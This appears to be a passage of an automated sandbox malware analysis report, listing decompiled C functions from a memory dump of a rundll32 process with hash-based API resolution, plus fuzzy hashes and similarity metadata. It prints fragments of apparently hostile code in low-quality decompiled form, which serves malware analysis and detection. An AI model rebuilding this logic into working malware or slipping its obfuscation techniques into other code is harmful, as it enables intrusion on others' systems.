                                				_t186 = _t248;
                                				 *((long long*)(_t186 + 0x10)) = __rbx;
                                				 *((intOrPtr*)(_t186 + 0x20)) = r9d;
                                				 *((long long*)(_t186 + 0x18)) = __r8;
                                				 *((long long*)(_t186 + 8)) = __rcx;
                                				_t249 = _t248 - 0x50;
                                				_t244 =  *0x359ed458;
                                				_t187 =  *0x359ed448;
                                				 *((long long*)(_t249 + 0x38)) = _t187;
                                				E0000017B17B359E908C(0x38e683e4, _t187,  *((intOrPtr*)( *0x359ed458 + 0x18)));
                                				if (_t187 == _t237) goto 0x359e5691;
                                				_t9 = _t237 + 0xa; // 0xa
                                				 *_t187();
                                				E0000017B17B359E908C(0x9c66d81c, _t187,  *((intOrPtr*)( *0x359ed458 + 0x18)));
                                				if (_t187 == _t237) goto 0x359e56ab;
                                				 *_t187();
                                				_t12 = _t249 + 0x30; // -126
                                				_t89 = E0000017B17B359E5BA4(_t12);
                                				_t13 = _t249 + 0x30; // -126
                                				r11d = _t89;
                                				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                                				_t18 = _t269 + 3; // 0x3
                                				E0000017B17B359E13EC(_t18, _t187, __rbx, _t13);
                                				 *((long long*)(_t249 + 0x40)) = _t187;
                                				if (_t187 == _t237) goto 0x359e59e0;
                                				r12d = 0xfb849f8f;
                                				E0000017B17B359E908C(r12d, _t187,  *((intOrPtr*)( *0x359ed458 + 0x18)));
                                				if (_t187 == _t237) goto 0x359e5711;
                                				 *_t187();
                                				goto 0x359e5713;
                                				E0000017B17B359E908C(r12d, _t187,  *((intOrPtr*)(_t244 + 0x18)));
                                				if (_t187 == _t237) goto 0x359e572e;
                                				r13d =  *_t187();
                                				goto 0x359e5731;
                                				r13d = 0;
                                				_t23 = _t192 + 7; // 0x7
                                				r8d = _t273 + _t23;
                                				HeapAlloc(_t281, _t277, _t273);
                                				if (_t187 == _t237) goto 0x359e59d2;
                                				_t24 = _t192 + 1; // 0x1
                                				r8d = _t24;
                                				0x359e47b0();
                                				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0x359e57a3;
                                				if ( *((intOrPtr*)(_t249 + 0xa8)) == 0) goto 0x359e57a3;
                                				_t188 =  *((intOrPtr*)(_t249 + 0x38));
                                				r8d = 6;
                                				0x359e47b0();
                                				_t32 = _t273 + 1; // 0x1
                                				r8d = _t32;
                                				0x359e47b0();
                                				_t234 = _t187;
                                				if (E0000017B17B359EA238(_t9, 0, _t167,  *((intOrPtr*)(_t249 + 0xa8)), _t192,  *((intOrPtr*)(_t249 + 0x90)), _t234, _t249 + 0x48, _t264) != 0) goto 0x359e59c4;
                                				_t193 =  *((intOrPtr*)(_t249 + 0xb0));
                                				 *_t193 =  *((intOrPtr*)(_t249 + 0x48));
                                				E0000017B17B359E908C(0xfb849f8f, _t188,  *((intOrPtr*)(_t244 + 0x18)));
                                				if (_t188 == _t237) goto 0x359e57ea;
                                				 *_t188();
                                				goto 0x359e57ec;
                                				 *((intOrPtr*)(_t193 + 0x10)) = 0;
                                				_t41 = _t234 + 0x34; // 0x34
                                				r8d = _t41;
                                				 *((intOrPtr*)(_t193 + 0x14)) = 1;
                                				HeapAlloc(_t270, _t237, _t240);
                                				if (_t188 == _t237) goto 0x359e59b6;
                                				_t43 = _t249 + 0x30; // 0xfb849fcf
                                				_t109 = E0000017B17B359E5BA4(_t43);
                                				_t44 = _t249 + 0x30; // 0xfb849fcf
                                				r11d = _t109;
                                				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                                				_t49 = _t269 + 3; // 0x3
                                				E0000017B17B359E13EC(_t49, _t188, _t193, _t44);
                                				if (_t188 == _t237) goto 0x359e59a8;
                                				0x359eb158();
                                				HeapFree(_t243, ??);
                                				 *((long long*)(_t193 + 8)) = _t188;
                                				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0x359e59fa;
                                				_t141 =  *((intOrPtr*)(_t249 + 0xa8));
                                				if (_t141 == 0) goto 0x359e59fa;
                                				r8d = _t141;
                                				_t190 = _t193 + 0x28;
                                				 *((long long*)(_t249 + 0x20)) = _t190;
                                				if (E0000017B17B359E7CF4(_t190, _t193,  *((intOrPtr*)(_t249 + 0x90)),  *((intOrPtr*)(_t249 + 0xa0)), _t188, _t193 + 0x18) != 0) goto 0x359e59a8;
                                				r15d = 0x77;
                                				 *((intOrPtr*)(_t193 + 0x2c)) = 1;
                                				HeapAlloc(??, ??, ??);
                                				if (_t190 == _t237) goto 0x359e59a3;
                                				_t62 = _t249 + 0x30; // 0xfb849fcf
                                				_t122 = E0000017B17B359E5BA4(_t62);
                                				_t63 = _t249 + 0x30; // 0xfb849fcf
                                				r11d = _t122;
                                				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                                				_t68 = _t269 + 3; // 0x3
                                				_t131 = E0000017B17B359E13EC(_t68, _t190, _t193, _t63);
                                				 *((long long*)(_t249 + 0x48)) = _t190;
                                				if (_t190 == _t237) goto 0x359e5995;
                                				0x359eb158();
                                				r11d = _t131;
                                				r15d = r15d - r11d;
                                				 *((long long*)(_t249 + 0x20)) =  *((intOrPtr*)(_t249 + 0x38)) + 0x17b359f129f;
                                				0x359eb158();
                                				 *((long long*)(_t193 + 0x20)) = _t190;
                                				goto 0x359e59b9;
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				return 2;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID:
                                • API String ID: 1659099196-0
                                • Opcode ID: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction ID: e23852087a02b3e6f0ad76bebb6feafcec778411056e6515273cf04e4c8754a0
                                • Opcode Fuzzy Hash: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction Fuzzy Hash: DBA18D3621CA8086DB15DB3AE4803DE67B2FBC9B84FA44611EE4E87B55DF38C9D58740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph (function 17b359e7fd4; legend: Executed / Not Executed)
                                C-Code - Quality: 46%
                                			E0000017B17B359E7FD4(signed int __edx, char* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8) {
                                				void* __rdi;
                                				signed int _t34;
                                				void* _t66;
                                				char* _t104;
                                				void* _t131;
                                				char* _t134;
                                				long long _t140;
                                				void* _t141;
                                				void* _t143;
                                				void* _t144;
                                				signed long long _t156;
                                				void* _t158;
                                
                                				_t106 = __rbx;
                                				_t104 = __rax;
                                				 *((long long*)(_t143 + 8)) = __rbx;
                                				 *((long long*)(_t143 + 0x18)) = _t140;
                                				 *((long long*)(_t143 + 0x20)) = __rsi;
                                				_t144 = _t143 - 0x40;
                                				r14d =  *0x359ed450;
                                				_t141 = __rcx;
                                				_t137 =  *((intOrPtr*)( *0x359ed458 + 8));
                                				r12d = 0;
                                				_t34 = r14d ^ __edx;
                                				if (_t34 == 0x139d2b8d) goto 0x359e80ef;
                                				if (_t34 == 0x15f5a8c2) goto 0x359e8115;
                                				if (_t34 == 0x2f77acf9) goto 0x359e80e9;
                                				if (_t34 == 0x48e12436) goto 0x359e81c8;
                                				if (_t34 == 0x4d382929) goto 0x359e8164;
                                				if (_t34 == 0xb016dc39) goto 0x359e80c9;
                                				if (_t34 == 0xb057dfc9) goto 0x359e805b;
                                				goto 0x359e821b;
                                				if (r9d == 0) goto 0x359e80bf;
                                				E0000017B17B359E85CC(r9d, __rbx, __r8,  *((intOrPtr*)( *0x359ed458 + 8)), _t158);
                                				if (_t104 == 0) goto 0x359e80b5;
                                				 *(_t144 + 0x20) =  *(_t144 + 0x20) & _t156;
                                				if (E0000017B17B359E14B8(_t104, _t106, _t141, 0x17b359e34a4,  *((intOrPtr*)( *0x359ed458 + 8)), _t104,  *((intOrPtr*)(_t144 + 0x80))) != 0) goto 0x359e80a2;
                                				goto 0x359e821b;
                                				HeapFree(_t131, ??);
                                				goto 0x359e821b;
                                				goto 0x359e821b;
                                				goto 0x359e821b;
                                				E0000017B17B359E908C(0xd97160e4, _t104,  *((intOrPtr*)( *((intOrPtr*)( *0x359ed458 + 8)) + 0x18)));
                                				if (_t104 == 0) goto 0x359e80e2;
                                				 *_t104();
                                				goto 0x359e821b;
                                				r12d = 1;
                                				if ( *(_t141 + 0x50) == 0) goto 0x359e814a;
                                				E0000017B17B359E908C(0xf2d20ec6, _t104,  *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x28)) + 0x18)));
                                				if (_t104 == 0) goto 0x359e8139;
                                				 *_t104();
                                				goto 0x359e813e;
                                				if (r9d == 0) goto 0x359e80bf;
                                				E0000017B17B359E85CC(r9d,  *(_t141 + 0x50), _t104,  *((intOrPtr*)( *0x359ed458 + 8)), _t156);
                                				_t134 = _t104;
                                				if (_t104 == 0) goto 0x359e80b5;
                                				goto 0x359e807a;
                                				asm("sbb ebx, ebx");
                                				goto 0x359e814f;
                                				if (r12d == 0) goto 0x359e821b;
                                				if (0x426 != 0x426) goto 0x359e821b;
                                				if (_t134 == 0) goto 0x359e81be;
                                				if ( *_t134 == 0) goto 0x359e81be;
                                				E0000017B17B359E487A();
                                				if (E0000017B17B359E5448(_t104,  *(_t141 + 0x50), _t134, _t144 + 0x30, _t137, _t141) != 0) goto 0x359e81bc;
                                				if (E0000017B17B359E672C(_t134, _t144 + 0x30, _t144 + 0x68) == 0) goto 0x359e81be;
                                				asm("ror ax, 0x8");
                                				 *((short*)(_t144 + 0x32)) =  *(_t144 + 0x68) & 0x0000ffff;
                                				r12d = 1;
                                				if (0 != 0) goto 0x359e821b;
                                				if ( *(_t141 + 0x50) == 0) goto 0x359e81fb;
                                				 *(_t141 + 0x50) =  *(_t141 + 0x50) & 0x00000000;
                                				E0000017B17B359E2874( *((intOrPtr*)( *0x359ed458 + 8)),  *(_t141 + 0x50), _t134,  *(_t141 + 0x50));
                                				HeapFree(??, ??, ??);
                                				goto 0x359e8200;
                                				if (r12d == 0) goto 0x359e821b;
                                				_t27 = _t144 + 0x30; // 0x31
                                				_t66 = E0000017B17B359E9214( *((intOrPtr*)( *0x359ed458 + 8)), _t27, _t134,  *(_t141 + 0x50), _t141,  *((intOrPtr*)(_t141 + 0x38)), _t141 + 0x50);
                                				if ( *((long long*)(_t144 + 0x80)) == 0) goto 0x359e8241;
                                				if (_t66 == 0x3e5) goto 0x359e8241;
                                				r8d = _t66;
                                				E0000017B17B359E6AC0( *0x359ed458,  *((intOrPtr*)( *0x359ed458 + 8)), _t141,  *((intOrPtr*)(_t144 + 0x80)),  *(_t141 + 0x50), _t141);
                                				return _t66;
                                			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: ))8M$6$H$lJu
                                • API String ID: 3298025750-2816507560
                                • Opcode ID: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction ID: 2df318bd7a24e02da79bc4e5879e4a7f0f4168eb6955912eaef4f33b3fe1468b
                                • Opcode Fuzzy Hash: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction Fuzzy Hash: 7061603120CB8185FB659AFA99D03EA52B1BF847C4F784265EE4D4B7D6DF28C8C58380
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph (function 17b359e1bfc; legend: Executed / Not Executed)
                                C-Code - Quality: 17%
                                			E0000017B17B359E1BFC(long long* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, intOrPtr _a8, long long _a16, long long _a24, long long _a40, long long _a48) {
                                				long long _v72;
                                				char _v80;
                                				char _v88;
                                				long long _v96;
                                				char _v104;
                                				signed int _v112;
                                				long long _v120;
                                				long long _v128;
                                				intOrPtr _v136;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				signed int _t65;
                                				intOrPtr _t93;
                                				intOrPtr _t94;
                                				long long* _t148;
                                				long long* _t152;
                                				long long* _t155;
                                				long long* _t157;
                                				intOrPtr* _t188;
                                				intOrPtr _t189;
                                				long long _t192;
                                				long long* _t193;
                                				void* _t203;
                                				intOrPtr _t213;
                                				long long _t214;
                                
                                				_t157 = __rbx;
                                				_t148 = __rax;
                                				_a24 = __rbx;
                                				_a16 = __rdx;
                                				_t214 =  *0x359ed458;
                                				_t192 =  *((intOrPtr*)(__rcx));
                                				r13d = r8d;
                                				_t193 = __rcx;
                                				_v72 = _t214;
                                				_v96 = _t192;
                                				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x359e1c4a;
                                				E0000017B17B359E47B8(0, __rax, __rbx, __rcx, __rdx);
                                				E0000017B17B359E908C(0x4a75e5e7, __rax,  *((intOrPtr*)(_t214 + 0x10)));
                                				if (_t148 == _t157) goto 0x359e1c63;
                                				_t9 = _t192 + 0x18; // 0x18
                                				 *_t148();
                                				_t65 =  *(_t193 + 0x50) & 0x000000ff;
                                				if (( *(_t193 + 0x70) & 0x000000ff) - _t65 >= 0) goto 0x359e1cdd;
                                				_t188 =  *((intOrPtr*)( *((intOrPtr*)(_t193 + 0x48)) + _t9 * 8));
                                				_t93 =  *_t188;
                                				if (_t93 == 0) goto 0x359e1c94;
                                				if (_t93 == 0x2f) goto 0x359e1c90;
                                				_t94 =  *((intOrPtr*)(_t188 + 1));
                                				if (_t94 != 0) goto 0x359e1c82;
                                				if (_t94 != 0) goto 0x359e1c97;
                                				_t152 = _t157;
                                				if (_t152 == _t157) goto 0x359e1caf;
                                				if ( *((char*)(_t152 - 1)) != 0x3a) goto 0x359e1caf;
                                				if ( *((char*)(_t152 + 1)) != 0x2f) goto 0x359e1caf;
                                				E0000017B17B359E240C(0, _t157, _t9 + _t188, _t192, _t193);
                                				if (_t152 == _t157) goto 0x359e1cdd;
                                				bpl = _t65 - 0x4a75e5e7 + 2 == 8;
                                				_a8 = 0;
                                				goto 0x359e1ceb;
                                				E0000017B17B359E908C(0x8d72aad2, _t152,  *((intOrPtr*)(_t214 + 0x10)));
                                				if (_t152 == _t157) goto 0x359e1d09;
                                				 *_t152();
                                				if (_t152 == _t157) goto 0x359e1ed1;
                                				_t23 =  &_v104; // 0x2
                                				r9d = 0;
                                				r8d = r13d;
                                				_v112 = _t23;
                                				_t25 =  &_v88; // 0x12
                                				_t189 = _a16;
                                				_v120 = _t25;
                                				_t27 =  &_v80; // 0x1a
                                				_t155 = _t27;
                                				_v128 = _t155;
                                				_v136 = 0;
                                				if (E0000017B17B359E5168(_t157, _t193, _t189, _t203) != 0) goto 0x359e1ec1;
                                				_t213 =  *0x359ed458;
                                				E0000017B17B359E908C(0x4a75e5e7, _t155,  *((intOrPtr*)(_t213 + 0x10)));
                                				if (_t155 == _t157) goto 0x359e1d77;
                                				 *_t155();
                                				if ( *((intOrPtr*)(_t193 + 0x18)) == _t157) goto 0x359e1d8c;
                                				E0000017B17B359E240C(0, _t157,  *((intOrPtr*)(_t193 + 0x18)), _t192, _t193);
                                				goto 0x359e1d94;
                                				E0000017B17B359E908C(0x8d72aad2, _t155,  *((intOrPtr*)(_t213 + 0x10)));
                                				if (_t155 == _t157) goto 0x359e1dad;
                                				 *_t155();
                                				if (_a8 == _t157) goto 0x359e1ea1;
                                				E0000017B17B359E908C(0xfb849f8f, _t155,  *((intOrPtr*)(_t214 + 0x18)));
                                				if (_t155 == _t157) goto 0x359e1dd5;
                                				r14d =  *_t155();
                                				goto 0x359e1dd8;
                                				r14d = 0;
                                				E0000017B17B359E908C(0xfb849f8f, _t155,  *((intOrPtr*)(_v72 + 0x18)));
                                				if (_t155 == _t157) goto 0x359e1df7;
                                				r13d =  *_t155();
                                				goto 0x359e1dfa;
                                				r13d = 0;
                                				_t40 = _t214 + 2; // 0x2
                                				E0000017B17B359E240C(_t213 + _t40, _t157, _t152, _t192, _a8);
                                				if (_t155 == _t157) goto 0x359e1e93;
                                				_t41 = _t213 + 1; // 0x1
                                				r8d = _t41;
                                				 *((char*)(_t189 + _t155)) = 0x2f;
                                				0x359e47b0();
                                				_v112 = 0 | _a8 != 0x00000000 | 0x00000002;
                                				_v120 = _a48;
                                				_v128 = _a40;
                                				_v136 = _v104;
                                				if (E0000017B17B359E6518(_a40, _v96, _t155, _t192, _a8, _t155, _v80, _v88) != 0x10d2) goto 0x359e1e85;
                                				asm("sbb eax, eax");
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				goto 0x359e1ed6;
                                				return 8;
                                			}






























                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
                                • String ID: uJ$uJ
                                • API String ID: 2332451156-3171342107
                                • Opcode ID: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction ID: 9bac9eea6c1d34af3320a538358d84060d47aa1213f1a91b253a0499f03b5103
                                • Opcode Fuzzy Hash: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction Fuzzy Hash: 6D81733670CAC086DB60DB7AE4903EEA7B1BBC9B84F684525EA8E47755DF38C4C59700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 19%
                                			E0000017B17B359EA238(void* __ecx, void* __edi, void* __ebp, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9, void* _a8, long long* _a24, char _a32) {
                                				char _v72;
                                				char _v80;
                                				char _v88;
                                				long long _v104;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t41;
                                				void* _t43;
                                				long long* _t82;
                                				long long _t83;
                                				long long _t84;
                                				intOrPtr _t108;
                                				void* _t109;
                                				intOrPtr _t110;
                                				void* _t112;
                                				void* _t115;
                                				long long* _t118;
                                				void* _t130;
                                				long _t133;
                                				void* _t134;
                                				long _t136;
                                				void* _t139;
                                
                                				_t84 = __rbx;
                                				_t82 = _t118;
                                				 *((long long*)(_t82 + 8)) = __rbx;
                                				 *((long long*)(_t82 + 0x18)) = __r8;
                                				_t3 = _t82 + 0x20; // 0xfb849fa7
                                				_t134 = __rcx;
                                				E0000017B17B359E24B0(__rbx, _t3, _t112);
                                				if (_t82 == 0) goto 0x359ea3dc;
                                				E0000017B17B359E908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0x359ed458 + 0x18)));
                                				if (_t82 == 0) goto 0x359ea29f;
                                				_v88 =  *_t82();
                                				goto 0x359ea2a5;
                                				_v88 = 0;
                                				_t10 = _t82 + 1; // 0x1
                                				r8d = _t109 + _t10;
                                				HeapAlloc(_t139, _t136, _t133);
                                				_v80 = _t82;
                                				if (_t82 == 0) goto 0x359ea3ce;
                                				0x359e47b0();
                                				_t13 = _t109 + 1; // 0x1
                                				r8d = _t13;
                                				0x359e47b0();
                                				E0000017B17B359E908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0x359ed458 + 0x18)));
                                				if (_t82 == 0) goto 0x359ea30d;
                                				 *_t82();
                                				goto 0x359ea30f;
                                				_t16 =  &_a32; // 0xfb84a007
                                				_t17 =  &_v72; // 0xfb849f9f
                                				r8d = 0;
                                				_v104 = _t16;
                                				_t41 = E0000017B17B359E7CF4(_t82, _t84, _t134, _t82,  *((intOrPtr*)( *0x359ed458 + 8)), _t17, _t130, _t109);
                                				HeapFree(??, ??, ??);
                                				if (_t41 != 0) goto 0x359ea3ce;
                                				r8d = _a32;
                                				_t108 = _v72;
                                				_t21 =  &_v88; // 0xfb849f8f
                                				_t83 = _t21;
                                				_t22 =  &_v80; // 0xfb849f87
                                				_v104 = _t83;
                                				_t43 = E0000017B17B359E52B8(_t84, _t108, _t82,  *((intOrPtr*)( *0x359ed458 + 8)), _t22, _t112, _t115);
                                				_t110 = _v80;
                                				if (_v88 == 0) goto 0x359ea389;
                                				if ( *((char*)(_t108 + _t110)) != 0x3d) goto 0x359ea389;
                                				if (_t134 - 1 != 0) goto 0x359ea37a;
                                				 *((char*)(_t83 + _t110)) = 0;
                                				if (_t43 != 0) goto 0x359ea3b0;
                                				E0000017B17B359E7500(_t84, _t110, _t108, _t110, _t82,  *((intOrPtr*)( *0x359ed458 + 8)));
                                				if (_t83 != 0) goto 0x359ea3a5;
                                				_t29 = _t83 + 8; // 0x8
                                				goto 0x359ea3b0;
                                				 *_a24 = _t83;
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				return _t29;
                                			}



























                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID:
                                • API String ID: 1659099196-0
                                • Opcode ID: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction ID: 2d05cc18f9ed2a87b7a6d77bc229425c709979d7adb832fb92d67eee268c1f8d
                                • Opcode Fuzzy Hash: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction Fuzzy Hash: A741A03130C78099EB65DB6AA48479A67B1FFC9BC4F244225EE4E43B55EF38C9C58700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 41%
                                			E0000017B17B359E2DC4(void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
                                				intOrPtr _v88;
                                				void* _v96;
                                				void* _v104;
                                				long long _v112;
                                				signed int _v120;
                                				long long _v128;
                                				long long _v136;
                                				void* __rbx;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				signed int _t72;
                                				signed int _t80;
                                				void* _t81;
                                				void* _t97;
                                				signed int _t98;
                                				void* _t99;
                                				void* _t114;
                                				long long* _t139;
                                				signed long long _t140;
                                				long long* _t142;
                                				void* _t143;
                                				void* _t169;
                                				void* _t170;
                                				void* _t172;
                                				signed int _t173;
                                				long _t177;
                                				void* _t179;
                                				void* _t190;
                                				void* _t191;
                                				void* _t192;
                                				signed int* _t193;
                                				long long _t194;
                                				void* _t200;
                                				long _t202;
                                				void* _t205;
                                
                                				_t191 = _t179;
                                				 *((long long*)(_t191 + 0x18)) = __r8;
                                				 *((long long*)(_t191 + 0x10)) = __rdx;
                                				_t203 =  *0x359ed458;
                                				 *(_t191 + 0x20) =  *(_t191 + 0x20) & 0x00000000;
                                				_t170 = __rcx;
                                				_v120 =  *0x359ed450;
                                				r15d = 0;
                                				 *(_t191 - 0x60) =  *(_t191 - 0x60) & _t205;
                                				_v112 =  *((intOrPtr*)( *0x359ed458 + 8));
                                				if (E0000017B17B359E4320(_t143, __rcx, _t191 - 0x68, __rcx, _t172, _t191 + 8) == 0) goto 0x359e2e29;
                                				_t12 = _t205 + 1; // 0x1
                                				r12d = _t12;
                                				_v104 = _t172;
                                				goto 0x359e2e34;
                                				_t173 = _v104;
                                				r12d = 2;
                                				_t15 =  &_a32; // 0xca
                                				if (E0000017B17B359E4880(r12d, _t114,  *((intOrPtr*)( *0x359ed458 + 8)), _t143, _t170,  &_v96, _t15) != 0) goto 0x359e2f94;
                                				r8d = _a32;
                                				r13d = r8d;
                                				r13d = r13d - r12d;
                                				_t193 = _v96;
                                				if (_t173 == 0) goto 0x359e2e8d;
                                				_t72 = _a8;
                                				_t193[0xa] = 1;
                                				_t193[0x12] = _t173;
                                				_t193[0xd] = _t72;
                                				_t193[0x10] = _t72;
                                				_t25 = _t170 + 0xc0; // 0xc0
                                				r9d = 0;
                                				 *_t193 = _v120 ^ 0x62ade362;
                                				_t193[3] =  *(_t170 + 0x48);
                                				_t193[2] =  *(_t170 + 0x4c);
                                				_t30 =  &_a8; // 0xb2
                                				_v128 = _t30;
                                				_t32 =  &_v120; // 0x32
                                				_v136 = _t32;
                                				_t97 = E0000017B17B359E1BFC(_t32, _t143, _t25, _t193);
                                				HeapFree(_t205, _t202, _t200);
                                				if (r13d == 0) goto 0x359e2f01;
                                				if (_t97 == 0) goto 0x359e2ef6;
                                				if (_t97 != 0x10d2) goto 0x359e2f01;
                                				E0000017B17B359EA3F8(r13d, _t32, _t143, _t170, _t173, _t177, _t192, _t169);
                                				if (_t97 != 0) goto 0x359e2f94;
                                				_t98 = _a8;
                                				_t194 = _v120;
                                				r13d =  *(_t170 + 0x4c);
                                				_t80 = E0000017B17B359E6C1C(_t98, _t194);
                                				_t38 =  &_a8; // 0xb2
                                				r9d = 1;
                                				 *(_t170 + 0x48) = _t98;
                                				 *(_t170 + 0x4c) = _t80;
                                				_t81 = E0000017B17B359E7B6C(_t143, _t170, _t194, _t173, _t177, _t38, _t190, _t191);
                                				_t99 = _t81;
                                				if (_t81 != 0) goto 0x359e2f71;
                                				_t139 = _a16;
                                				 *_t139 = _t194;
                                				 *_a24 = _a8;
                                				if ( *(_t170 + 0x4c) != r13d) goto 0x359e2fcd;
                                				goto 0x359e2fc7;
                                				HeapFree(_t172, _t177, _t143);
                                				_t47 = _t170 + 0xc0; // 0xc0
                                				E0000017B17B359E47B8(_t99, _t139, _t143, _t47, _t177);
                                				goto 0x359e2faf;
                                				if (_t99 == 0x10d2) goto 0x359e2fc2;
                                				_t48 = _t170 + 0xc0; // 0xc0
                                				if (E0000017B17B359E47B8(_t99, _t139, _t143, _t48, _t177) != 0) goto 0x359e2fcd;
                                				asm("lock or dword [edi+0xec], 0x1");
                                				goto 0x359e2fcd;
                                				r15d = 1;
                                				if ( *((intOrPtr*)(_t170 + 0x60)) == 0) goto 0x359e302f;
                                				E0000017B17B359E908C(0x9c66d81c, _t139,  *((intOrPtr*)( *0x359ed458 + 0x18)));
                                				if (_t139 == 0) goto 0x359e2fed;
                                				 *_t139();
                                				if (r15d == 0) goto 0x359e301c;
                                				_t140 =  *((intOrPtr*)(_t170 + 0x58));
                                				if (_v88 - _t140 <= 0) goto 0x359e301c;
                                				_t57 = _t170 + 0xc0; // 0xc1
                                				if (E0000017B17B359E47B8(_t99, _t140, _t143, _t57, _t177) != 0) goto 0x359e301c;
                                				asm("lock or dword [edi+0xec], 0x1");
                                				_t142 = _t140 * 0x23c34600 + _v88;
                                				 *((long long*)(_t170 + 0x58)) = _t142;
                                				if (_v104 == 0) goto 0x359e308e;
                                				HeapFree(??, ??, ??);
                                				if (_t99 == 0) goto 0x359e304e;
                                				if (_t99 != 0x10d2) goto 0x359e308e;
                                				E0000017B17B359E908C(0x4a75e5e7, _t142,  *((intOrPtr*)( *0x359ed458 + 0x10)));
                                				if (_t142 == 0) goto 0x359e3067;
                                				 *_t142();
                                				 *(_t170 + 0x98) =  *(_t170 + 0x98) & 0x00000000;
                                				 *(_t170 + 0x9c) =  *(_t170 + 0x9c) & 0x00000000;
                                				E0000017B17B359E908C(0x8d72aad2, _t142,  *((intOrPtr*)(_t203 + 0x10)));
                                				if (_t142 == 0) goto 0x359e308e;
                                				 *_t142();
                                				return _t99;
                                			}








































                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc
                                • String ID: uJ
                                • API String ID: 3901518246-2850656762
                                • Opcode ID: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction ID: 0aff06a091149d2ecce26a179196eae53501b62235ae933b5e4735799297e87e
                                • Opcode Fuzzy Hash: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction Fuzzy Hash: 62819E3220D78096EB65CB2AE484BDAB3B4FB88784F644625EE4D47B85DB39D4D5CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
                                • String ID:
                                • API String ID: 2332451156-0
